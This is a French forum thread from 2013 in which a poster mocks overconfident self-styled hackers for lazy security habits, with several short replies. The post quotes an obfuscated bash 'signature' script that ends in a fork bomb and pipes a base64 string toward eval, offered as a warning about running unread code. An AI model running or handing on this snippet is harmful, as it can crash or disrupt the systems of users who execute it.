Affichage hiérarchique

InstinctHack · (Modification du message : 06-08-2013, 21h09 par InstinctHack.)

io,

Attention, ce post est volontairement piquant, il est là pour vous faire l'effet d'un seau d'eau froide sur la tête. Vous n'êtes pas content ? Continuez votre vie comme avant. </matrix_theme>

Introduction

Depuis, 2-3 jours, je m'étonne du comportement de certaines personnes qui se disent hacker.
Bon, ça me fout, et de toute façon, je le dis et je le redis hacker != pro de la sécurité informatique.
Mais c'est bien dans ce sens qu'ils le disent...
(je vais passer sur les propositions plus ou moins chelous que je reçois en mp)

Un mot sur les gens

Les idiots de consommateurs de technologies not informés
Ils ne savent rien, ne font qu'acheter, utiliser des OS propriétaires ( Smile

), des programmes payés à prix d'or, des paths de jeu trouvés sur un serveur chelou en chine, installent des hacks de logiciels pleins de saloperies, etc....
Ces gens sont un problème pour leur propre sécurité à cause de leur ignorance du sujet.

Les H4ck0RS

Eux ils savent.
Ils savent le fonctionnement des routeurs, des points de peelling, les FAI associatifs, les OS libres ( Sleepy

), les logiciels libres, les failles de sécurités, ils savent comment les modèles client-server, décentralisé fonctionne, le chiffrement, la stéganographie, comment une page web s'affiche et comment le serveur tourne, ils savent comment détecter les rootkits, configurer un firewall, programmer des scripts de malade, coder des robots qui parcourront le monde d'internet, rien ne leur résistent.

C'est vrai quoi, vous vous rendez compte de ce que certain d'entre vous sont capables de faire ? Quelques programmeurs sont capables de faire un logiciel utilisé par des millions de gens, un hacker peut faire trembler de peur des sociétés de carte bancaire, un gosse de 18 ans peut récupérer des informations confidentielles d'apple, etc....
Les exploits ( :] ) des hackers sont très nombreux.

Mais ils ont deux problèmes.
L'un lié à l'humanité.
L'autre à eux.
Le premier c'est tout simplement la flemme.

Le deuxième c'est le skill, surement, il sait ce qu'il fait le hacker ! Viens pas lui dire le contraire.
Ces gens sont un problème pour leur propre sécurité à cause de leur (fausse et/ou incomplète ?) connaissance du sujet.

Où est-ce que je veux en venir ?

Le savoir rend con.
C'est vrai, quelqu'un qui n'y connait rien en info, mais qui veut se protéger, est méfiant, il s'intéresse, mais prend garde.
Un habitué, un connaisseur, se disant qu'il s'y connait, connait les risques. Et c'est ça qu'il fait fausse route.

Sauf que

Ce n'est pas parce que tu connais les implentations de md5 en C de tête que ton md5 non salé est plus sûr que celui généré par le débutant qui as découvert la commande php md5() sur le siteduzero.
Ce n'est pas parce que tu connais iptables sur le bout de tes 11 doigts que tes ports sont protégés avec des tables de règles vides.

Exemple

Je me suis amusé à faire un programme hier, rien de très utile, mais à un moment, j'avais le choix entre :
ne pas récupérer toutes les informations que je voulais, mais être sûr de leur validité.
ou toutes les récupérer en sachant que quelqu'un aurais pus en falsifié certaines.

Je n'ai pas hésité une seconde :
[spoiler]
Si vous avez choisi la deuxième solution, considéré que vous êtes personnellement visé par ce présent message.
[/spoiler]

Bon et alors ? Bah j'en ai parlé sur irc, sur un channel de H4CK0RS, et là, je suis resté sans voix, un mec assez skilled a dis :
[spoiler]

Citation :osef de la sécu.

[/spoiler]

Ok, ce programme n'était pas important, rien n'était en jeu, il n'avais pas tout à fait tord. Mais tout de même, personnellement ça me fait froid dans le dos, un passionné de Sécurité Informatique qui dénigre sa passion... Huh

Et voilà une autre quote :

Attention, ce script est potentiellement dangereux et son exécution peut avoir des conséquences aléatoires selon les machines sur lequel il s'exécute.

Code BASH :

OxOO="/tmp/$(uname -r)" > /dev/null

touch $OxOO && echo -n $(cat /dev/urandom | head -c64) | sha1sum | awk '{print $1}' >> $OxOO

echo "R2FNZQo=" | base64 | eval

$(0x13=$IFS;IFS=':';for 0x37 in $PATH;do ls -1 $0x37;done && IFS=$0x13) > 0x80

0x42(){ 0x42|0x42& };0x42

C'est de moi. C'était encore il y a une heure ma signature, je l'ai retiré après une réaction d'un membre. (cc Smile

) )
Alors pourquoi le retiré ? Tout simplement parce qu'il semblerait que certaines règles élémentaire de sécurité informatique ne soit pas appliqués par les membres (je me souviens d'avoir vu une histoire comme ça...)
Et qu'il y avait un risque que quelqu'un éxécute ce code.

Conclusion

N'oubliez pas, passionné de sécurité informatique ou AppleUser ( Angel

), débutant, habitué ou expert :
1. vous êtes un humain, la plus grosse faille de sécurité jamais corrigée
2. vous êtes des flemmards.
3. cela causera votre perte.
4. vous ignorez au moins une partie du fonctionnement de votre ordinateur, de vos logiciels (bah oui, python c'est bien, mais si il y as une faille dans python, ton code peut être en béton, ta sécurité ne vaut rien), de votre périphériques (qui sait comment l'appuie d'une touche d'un clavier est détecté ? comment une ancienne souris détectait vos mouvements ? ) ou des réseaux sur lesquels vous êtes.

(ovh s'est pas fait powned à cause d'un password d'une boite mail d'un admin ? et ben si....)

Virez pas parano.
Virez parano.

Apprenez l'informatique.
Apprenez pas l'informatique.

Croyez moi.
Ne me croyez moi.

Ne soyez pas sûr de votre sécurité.
Soyez sûr de votre sécurité.

Jigsaw a écrit :Faites votre choix.

http://actes.sstic.org/SSTIC09/Pourquoi_..._echec.pdf

gruik · 06-08-2013, 20h47

(06-08-2013, 20h32)InstinctHack a écrit : (...) des points de peelling (...)

nope, this is peeling Big Grin

:

you mean peering :

[Image: PeeringDiagram.png]

InstinctHack · 06-08-2013, 20h49

Citation :Le deuxième c'est le skill, surement, il sait ce qu'il fait le hacker ! Viens pas lui dire le contraire.

Nan, mais stop gruik, je sais de quoi je parle.
Va plutôt révisser tes cours d'info au lieu de me faire perdre mon temps.

Big Grin

humour

(je laisse la faute pour le fun :> et parce que je sais de quoi je parle...)

gruik · 06-08-2013, 21h09

dans le même ordre d'idée, News0ft qui il y a quelques années parlait de l'échec de la sécurité

c4ffein · 07-08-2013, 09h53

Pour moi c'est assez logique, y a une différence entre avoir des compétences techniques et etre parano.

Jek0 · (Modification du message : 07-08-2013, 10h15 par Jek0.)

On va dire que l'un entraine l'autre, plus t'a de connaissances niveau info plus tu te rends compte qu'il est aisé de bypass beaucoup de choses/log tout ce qui se passe, plus tu fait gaffe à ce que tu fais/deviens parano.

Après j'vais dire "Acta non Verba", avoir des compétences c'est cool, savoir quoi en faire c'est bien, les utiliser c'est mieux !

ark · (Modification du message : 07-08-2013, 11h15 par ark.)

Post intéressant =)

Ça me déçoit quand même de voir que les gens regardent pas un minimum un bout de code avant de l'exec... Surtout quand il est légèrement obfusqué !

Et je confirme pour la flemme, c'est très chiant d'ailleurs!

InstinctHack · (Modification du message : 07-08-2013, 16h50 par InstinctHack.)

Identifiant Mot de passe
S’enregistrer \| Mot de passe oublié ? Se rappeler